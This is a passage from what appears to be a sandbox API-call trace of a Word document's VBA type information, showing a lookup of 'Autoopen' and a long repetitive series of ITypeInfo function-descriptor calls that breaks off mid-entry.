(_Key=0x186af8, _Base=0x6c328f0, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee426219c) returned 0x6c328f8 [0041.290] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0041.290] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Autoopen") returned 0x102ad9 [0041.292] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14010 [0041.292] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fe0 [0041.292] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186760 | out: ppvObject=0x186760*=0x0) returned 0x80004002 [0041.292] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1866a8 | out: ppvObject=0x1866a8*=0x6a86060) returned 0x0 [0041.293] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1866b8 | out: pVarVal=0x1866b8*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.293] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.293] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x1866b0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1866d0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1866d0*="") returned 0x0 [0041.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x1865c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.293] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x1866b0, pDummy=0x0 | out: ppTypeAttr=0x1866b0, pDummy=0x0) returned 0x0 [0041.293] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.293] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.293] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x10, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x11, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x12, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x13, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x14, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x15, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x16, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x17, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x18, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x19, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.294] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.294] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x20, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x21, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x22, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x23, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x24, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x25, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x26, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x27, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x28, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x29, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x30, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x31, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x32, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.295] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x33, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x34, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x35, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x36, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x37, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x38, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x39, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x40, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x41, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x42, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x43, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x44, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x45, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x46, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x47, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.296] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x48, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x49, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x50, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x51, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x52, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x53, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x54, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x55, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x56, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x57, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x58, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x59, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.297] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] 